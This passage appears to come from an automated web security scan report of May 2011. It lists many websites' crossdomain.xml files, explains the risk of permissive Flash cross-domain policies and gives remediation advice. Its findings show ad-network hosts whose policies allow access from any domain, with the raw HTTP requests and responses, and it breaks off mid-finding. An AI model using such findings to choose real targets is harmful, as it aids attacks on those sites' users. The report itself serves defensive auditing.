http://www.cariboucoffee.com/crossdomain.xml
http://www.carpictures.com/crossdomain.xml
http://www.cayenne.com/crossdomain.xml
http://www.centralmarket.com/crossdomain.xml
http://www.chamberorganizer.com/crossdomain.xml
http://www.chnlove.com/crossdomain.xml
http://www.coldplay.com/crossdomain.xml
http://www.collegeotr.com/crossdomain.xml
http://www.colony1.net/crossdomain.xml
http://www.contextads.net/crossdomain.xml
http://www.createfreepolls.com/crossdomain.xml
http://www.d2jsp.org/crossdomain.xml
http://www.daddario.com/crossdomain.xml
http://www.diesel.com/crossdomain.xml
http://www.dishant.com/crossdomain.xml
http://www.donbest.com/crossdomain.xml
http://www.dontstayin.com/crossdomain.xml
http://www.doublegames.com/crossdomain.xml
http://www.downy.com/crossdomain.xml
http://www.eventsinyuma.com/crossdomain.xml
http://www.exploregeorgia.org/crossdomain.xml
http://www.eyny.com/crossdomain.xml
http://www.findire.com/crossdomain.xml
http://www.firstresponse.com/crossdomain.xml
http://www.floorplanner.com/crossdomain.xml
http://www.forconstructionpros.com/crossdomain.xml
http://www.formrouter.net/crossdomain.xml
http://www.geckobyte.com/crossdomain.xml
http://www.goodbait.com/crossdomain.xml
http://www.h2onews.org/crossdomain.xml
http://www.helloatlanta.com/crossdomain.xml
http://www.house365.com/crossdomain.xml
http://www.hrs.com/crossdomain.xml
http://www.ihousenet.com/crossdomain.xml
http://www.imagetwist.com/crossdomain.xml
http://www.jackdaniels.com/crossdomain.xml
http://www.jumeirah.com/crossdomain.xml
http://www.justgiving.com/crossdomain.xml
http://www.kewego.fr/crossdomain.xml
http://www.kibagames.com/crossdomain.xml
http://www.kswo.com/crossdomain.xml
http://www.ktiv.com/crossdomain.xml
http://www.kwqc.com/crossdomain.xml
http://www.kzzp.com/crossdomain.xml
http://www.landsharklager.com/crossdomain.xml
http://www.littlebigplanet.com/crossdomain.xml
http://www.lotto.pl/crossdomain.xml
http://www.mapmyfitness.com/crossdomain.xml
http://www.maxadds.com/crossdomain.xml
http://www.maxdome.de/crossdomain.xml
http://www.mbrgames.com/crossdomain.xml
http://www.mercadolivre.com.br/crossdomain.xml
http://www.motorracingnetwork.com/crossdomain.xml
http://www.msgcu.org/crossdomain.xml
http://www.mydivadoll.com/crossdomain.xml
http://www.netminers.dk/crossdomain.xml
http://www.nowness.com/crossdomain.xml
http://www.osobnosti.cz/crossdomain.xml
http://www.outsidethebeltway.com/crossdomain.xml
http://www.paintthe88.com/crossdomain.xml
http://www.pentaximaging.com/crossdomain.xml
http://www.playingforchange.com/crossdomain.xml
http://www.playmymovs.com/crossdomain.xml
http://www.playsportstv.com/crossdomain.xml
http://www.podfeed.net/crossdomain.xml
http://www.pordeo.com/crossdomain.xml
http://www.ppcgeeks.com/crossdomain.xml
http://www.princesshouse.com/crossdomain.xml
http://www.royalvegas.eu/crossdomain.xml
http://www.rp-online.de/crossdomain.xml
http://www.sekindo.com/crossdomain.xml
http://www.sfgotobat.com/crossdomain.xml
http://www.sheezyart.com/crossdomain.xml
http://www.skullcandy.com/crossdomain.xml
http://www.smartvideochannel.com/crossdomain.xml
http://www.songselect.com/crossdomain.xml
http://www.splashup.com/crossdomain.xml
http://www.thecampuscommon.com/crossdomain.xml
http://www.theevonywiki.com/crossdomain.xml
http://www.themag12.com/crossdomain.xml
http://www.themat.com/crossdomain.xml
http://www.thomann.de/crossdomain.xml
http://www.ticketleap.net/crossdomain.xml
http://www.towsontigers.com/crossdomain.xml
http://www.traxnyc.com/crossdomain.xml
http://www.truthin2010.org/crossdomain.xml
http://www.tubeguide.info/crossdomain.xml
http://www.tunecore.com/crossdomain.xml
http://www.tvb.com/crossdomain.xml
http://www.twilightersanonymous.com/crossdomain.xml
http://www.verawang.com/crossdomain.xml
http://www.vertadnet.com/crossdomain.xml
http://www.vladtod.com/crossdomain.xml
http://www.wdasfm.com/crossdomain.xml
http://www.we7.com/crossdomain.xml
http://www.wect.com/crossdomain.xml
http://www.weebls-stuff.com/crossdomain.xml
http://www.wildfanny.com/crossdomain.xml
http://www.wowtattoos.com/crossdomain.xml
http://www.wten.com/crossdomain.xml
http://www.yardbarker.com/crossdomain.xml
http://www.yournewenglandforddealer.com/crossdomain.xml
http://ads.adbrite.com/crossdomain.xml
http://cookex.amp.yahoo.com/crossdomain.xml
http://feeds.bbci.co.uk/crossdomain.xml
http://newsrss.bbc.co.uk/crossdomain.xml
http://open.ad.yieldmanager.net/crossdomain.xml
http://www.126.com/crossdomain.xml
http://www.accu-chek.com/crossdomain.xml
http://www.actonsoftware.com/crossdomain.xml
http://www.allbran.com/crossdomain.xml
http://www.b92.net/crossdomain.xml
http://www.bimvid.com/crossdomain.xml
http://www.bookmaker.com/crossdomain.xml
http://www.bowtecharchery.com/crossdomain.xml
http://www.burton.com/crossdomain.xml
http://www.bvonstyle.com/crossdomain.xml
http://www.carnivalmagic.com/crossdomain.xml
http://www.citrix.com/crossdomain.xml
http://www.classicwordgames.com/crossdomain.xml
http://www.clubpogo.com/crossdomain.xml
http://www.ctnow.com/crossdomain.xml
http://www.ebay.pl/crossdomain.xml
http://www.ellusionist.com/crossdomain.xml
http://www.eluniversal.com/crossdomain.xml
http://www.facebook.com/crossdomain.xml
http://www.gadsdentimes.com/crossdomain.xml
http://www.giftcards.com/crossdomain.xml
http://www.hepsiburada.com/crossdomain.xml
http://www.hgvclub.com/crossdomain.xml
http://www.homeawayrealestate.com/crossdomain.xml
http://www.jaguar.com/crossdomain.xml
http://www.jameshardie.com/crossdomain.xml
http://www.kerpoof.com/crossdomain.xml
http://www.kidk.com/crossdomain.xml
http://www.kjct8.com/crossdomain.xml
http://www.kxlh.com/crossdomain.xml
http://www.lacoste.com/crossdomain.xml
http://www.lasalle.edu/crossdomain.xml
http://www.launchfire.com/crossdomain.xml
http://www.lespac.com/crossdomain.xml
http://www.marca.com/crossdomain.xml
http://www.mikesbikes.com/crossdomain.xml
http://www.minglehouse.com/crossdomain.xml
http://www.monica.com/crossdomain.xml
http://www.mtv.ca/crossdomain.xml
http://www.nin.com/crossdomain.xml
http://www.northerntrust.com/crossdomain.xml
http://www.nu.nl/crossdomain.xml
http://www.o.biz/crossdomain.xml
http://www.oregonlotteryloyalty.org/crossdomain.xml
http://www.our-hometown.com/crossdomain.xml
http://www.palacenet.com/crossdomain.xml
http://www.playtech.com/crossdomain.xml
http://www.portableairshop.com/crossdomain.xml
http://www.raylamontagne.com/crossdomain.xml
http://www.realbird.com/crossdomain.xml
http://www.reflector.com/crossdomain.xml
http://www.ryland.com/crossdomain.xml
http://www.samashmusic.com/crossdomain.xml
http://www.saukvalley.com/crossdomain.xml
http://www.schuelervz.net/crossdomain.xml
http://www.sleepconnect.com/crossdomain.xml
http://www.socializr.com/crossdomain.xml
http://www.spankwireinhd.com/crossdomain.xml
http://www.sub5zero.com/crossdomain.xml
http://www.superstreetonline.com/crossdomain.xml
http://www.swvatoday.com/crossdomain.xml
http://www.targetcenter.com/crossdomain.xml
http://www.tbd.com/crossdomain.xml
http://www.the39clues.com/crossdomain.xml
http://www.thefwa.com/crossdomain.xml
http://www.trade2win.com/crossdomain.xml
http://www.tradearca.com/crossdomain.xml
http://www.ualmileageplus.com/crossdomain.xml
http://www.uniqlo.com/crossdomain.xml
http://www.urbanministry.org/crossdomain.xml
http://www.usa-gymnastics.org/crossdomain.xml
http://www.usafootball.com/crossdomain.xml
http://www.usfunds.com/crossdomain.xml
http://www.webcampromotions.com/crossdomain.xml
http://www.wofford.edu/crossdomain.xml
http://www.woodsmith.com/crossdomain.xml
http://www.xstreetsl.com/crossdomain.xml
http://www.zapak.com/crossdomain.xml
http://www.zdnetasia.com/crossdomain.xml
http://www.zegeridotc.com/crossdomain.xml
http://www.123-reg.co.uk/crossdomain.xml
http://www.20minutos.es/crossdomain.xml
http://www.adddev2.com/crossdomain.xml
http://www.avaloncommunities.com/crossdomain.xml
http://www.bhgrealestate.com/crossdomain.xml
http://www.boomkat.com/crossdomain.xml
http://www.coahomacc.edu/crossdomain.xml
http://www.costore.com/crossdomain.xml
http://www.doctorswithoutborders.org/crossdomain.xml
http://www.donga.com/crossdomain.xml
http://www.eaglesband.com/crossdomain.xml
http://www.emporia.edu/crossdomain.xml
http://www.figures.com/crossdomain.xml
http://www.firstweber.com/crossdomain.xml
http://www.fly2houston.com/crossdomain.xml
http://www.fvtc.edu/crossdomain.xml
http://www.hostesscakes.com/crossdomain.xml
http://www.idahopress.com/crossdomain.xml
http://www.indianagazette.com/crossdomain.xml
http://www.jimmyjohns.com/crossdomain.xml
http://www.justjigsawpuzzles.com/crossdomain.xml
http://www.kspr.com/crossdomain.xml
http://www.lattc.edu/crossdomain.xml
http://www.lightreading.com/crossdomain.xml
http://www.market4free.com/crossdomain.xml
http://www.maysville-online.com/crossdomain.xml
http://www.mrclean.com/crossdomain.xml
http://www.myepets.com/crossdomain.xml
http://www.neaq.org/crossdomain.xml
http://www.neatco.com/crossdomain.xml
http://www.pecentral.org/crossdomain.xml
http://www.primos.com/crossdomain.xml
http://www.rifftrax.com/crossdomain.xml
http://www.samstowntunica.com/crossdomain.xml
http://www.scott-sports.com/crossdomain.xml
http://www.stjohnprovidence.org/crossdomain.xml
http://www.supermotors.net/crossdomain.xml
http://www.theknackkids.com/crossdomain.xml
http://www.virtualrabbit.com/crossdomain.xml
http://www.wendoverfun.com/crossdomain.xml

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

7.1. http://a.collective-media.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.collective-media.net

Response

HTTP/1.0 200 OK
Server: nginx/0.8.53
Content-Type: text/plain
Content-Length: 187
Last-Modified: Tue, 31 Aug 2010 17:41:28 GMT
Accept-Ranges: bytes
Date: Tue, 03 May 2011 15:43:25 GMT
Connection: close
Set-Cookie: JY57=CT; expires=Tue, 31-May-2011 15:43:25 GMT; path=/; domain=.collective-media.net
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow-http-request-headers-from domain="*" headers="*" secure="true"/>
</cross-domain-policy>

7.2. http://a.tribalfusion.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: a.tribalfusion.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/xml
Content-Length: 102
Connection: Close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.3. http://ad.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 21:42:14 GMT
Date: Tue, 03 May 2011 15:41:23 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

7.4. http://ad.turn.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Tue, 03 May 2011 15:41:31 GMT
Content-Type: text/xml;charset=UTF-8
Date: Tue, 03 May 2011 15:41:31 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

7.5. http://ads.pointroll.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.pointroll.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 170
Content-Type: text/xml
Last-Modified: Tue, 06 Apr 2010 18:31:31 GMT
Accept-Ranges: bytes
ETag: "8e43ce60b7d5ca1:14d1"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Tue, 03 May 2011 15:43:36 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

7.6. http://ads.specificmedia.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.specificmedia.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.specificmedia.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:42:11 GMT
Server: Apache/2.2.15 (Unix) DAV/2 mod_perl/2.0.4 Perl/v5.10.0
Last-Modified: Fri, 16 Oct 2009 21:03:11 GMT
ETag: "54b7f7-110-47613b93bc1c0"
Accept-Ranges: bytes
Content-Length: 272
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-d
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.7. http://adserv.impactengine.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adserv.impactengine.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: adserv.impactengine.com

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 15:40:39 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 26 May 2010 00:07:11 GMT
Accept-Ranges: bytes
Content-Length: 103
Cache-Control: max-age=7200, must-revalidate
Content-Type: text/xml
X-Cache: Miss from cloudfront
X-Amz-Cf-Id: 1cb1071157f224d5a858bf570e3b154a551934c5a1a6da2bf5612b5e9df865af4777337ef35745fb,45d6e4ccdb04fe059afa8c46e5821678d68c542595b1ddb3f2ee45052117214715009bff39f744b3
Via: 1.0 fee706bb2dcbccabb9a09a17e9d6037c.cloudfront.net:11180 (CloudFront), 1.0 6d5d46d2c7dcee5d4601d83b29b92a90.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.8. http://afe.specificclick.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://afe.specificclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: afe.specificclick.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/xml
Content-Length: 194
Date: Tue, 03 May 2011 15:42:09 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

7.9. http://aperture.displaymarketplace.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://aperture.displaymarketplace.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: aperture.displaymarketplace.com

Response

HTTP/1.0 200 OK
Content-Length: 268
Content-Type: text/xml
Content-Location: http://aperture.displaymarketplace.com/crossdomain.xml
Last-Modified: Wed, 06 Jan 2010 19:44:14 GMT
Accept-Ranges: bytes
ETag: "88db83a088fca1:96c"
Server: Microsoft-IIS/6.0
X-Server: D2A.NJ-a.dm.com
P3P: CP="NON DEVo PSAo PSDo CONo OUR BUS UNI"
X-Powered-By: ASP.NET
Expires: Tue, 03 May 2011 15:41:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 15:41:31 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<site-control perm
...[SNIP]...

7.10. http://ar.voicefive.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ar.voicefive.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 03 May 2011 15:42:18 GMT
Content-Type: text/xml
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Length: 230
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

7.11. http://as.casalemedia.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://as.casalemedia.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: as.casalemedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 25 Feb 2011 02:23:31 GMT
ETag: "17b0daf-e6-41faec0"
Accept-Ranges: bytes
Content-Length: 230
Content-Type: text/xml
Expires: Tue, 03 May 2011 15:41:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 15:41:56 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

7.12. http://b.scorecardresearch.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Wed, 04 May 2011 15:41:33 GMT
Date: Tue, 03 May 2011 15:41:33 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

7.13. http://b.voicefive.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.voicefive.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Wed, 04 May 2011 15:42:35 GMT
Date: Tue, 03 May 2011 15:42:35 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

7.14. http://bh.contextweb.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bh.contextweb.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: bh.contextweb.com

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
ETag: W/"384-1279190954000"
Last-Modified: Thu, 15 Jul 2010 10:49:14 GMT
Content-Type: application/xml
Content-Length: 384
Date: Tue, 03 May 2011 15:41:29 GMT
Connection: Keep-Alive
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-contro
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.15. http://c.betrad.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c.betrad.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: c.betrad.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "623d3896f3768c2bad5e01980f958d0a:1298927864"
Last-Modified: Mon, 28 Feb 2011 21:17:44 GMT
Accept-Ranges: bytes
Content-Length: 204
Content-Type: application/xml
Date: Tue, 03 May 2011 15:41:32 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

7.16. http://c.yardbarker.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c.yardbarker.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: c.yardbarker.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, proxy-revalidate
Pragma: no-cache
Content-Type: text/xml
Last-Modified: Fri, 05 Nov 2010 18:44:56 GMT
Accept-Ranges: bytes
ETag: "044698a197dcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 03 May 2011 17:09:23 GMT
Connection: keep-alive
Content-Length: 109

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.17. http://cache.specificmedia.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cache.specificmedia.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: cache.specificmedia.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:42:14 GMT
Server: PWS/1.7.2.1
X-Px: ht-d iad-agg-n27.panthercdn.com
ETag: "17186ff-110-4764a5a086640"
Cache-Control: max-age=604800
Expires: Sun, 08 May 2011 22:30:53 GMT
Age: 148281
Content-Length: 272
Content-Type: application/xml
Last-Modified: Mon, 19 Oct 2009 14:13:37 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-d
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.18. http://cdn.turn.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn.turn.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.turn.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: private
Content-Type: text/xml;charset=UTF-8
Cache-Control: private, max-age=0
Expires: Tue, 03 May 2011 15:41:33 GMT
Date: Tue, 03 May 2011 15:41:33 GMT
Content-Length: 100
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

7.19. http://cms.quantserve.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cms.quantserve.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: cms.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Wed, 04 May 2011 15:42:40 GMT
Content-Type: text/xml
Content-Length: 207
Date: Tue, 03 May 2011 15:42:40 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

7.20. http://d.xp1.ru4.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d.xp1.ru4.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: d.xp1.ru4.com

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Tue, 03 May 2011 15:41:30 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: text/xml
Last-modified: Mon, 22 Nov 2010 21:33:37 GMT
Content-length: 202
Etag: "ca-4ceae1b1"
Accept-ranges: bytes
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

7.21. http://d13.zedo.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d13.zedo.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: d13.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 19 May 2008 09:08:32 GMT
ETag: "1b42679-f7-44d91b52c0400"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/xml
Content-Length: 247
X-Varnish: 1739410876
Date: Tue, 03 May 2011 15:41:10 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

7.22. http://d3.zedo.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d3.zedo.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: d3.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 18 May 2009 07:34:56 GMT
ETag: "3a9d108-f8-46a2ad4ab2800"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/xml
Content-Length: 248
X-Varnish: 337326103
Date: Tue, 03 May 2011 15:41:10 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

7.23. http://d7.zedo.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: d7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Content-Length: 248
Content-Type: application/xml
ETag: "3a9d108-f8-46a2ad4ab2800"
X-Varnish: 1295231200
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=3051
Date: Tue, 03 May 2011 15:40:44 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

7.24. http://i.w55c.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://i.w55c.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: i.w55c.net

Response

HTTP/1.0 200 OK
Cache-Control: max-age=86400
Date: Tue, 03 May 2011 15:39:33 GMT
Server: Jetty(6.1.22)
Content-Type: application/xml
Via: 1.0 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Content-Length: 488

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" to-ports="*"/>
<site-control
...[SNIP]...

7.25. http://ib.adnxs.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
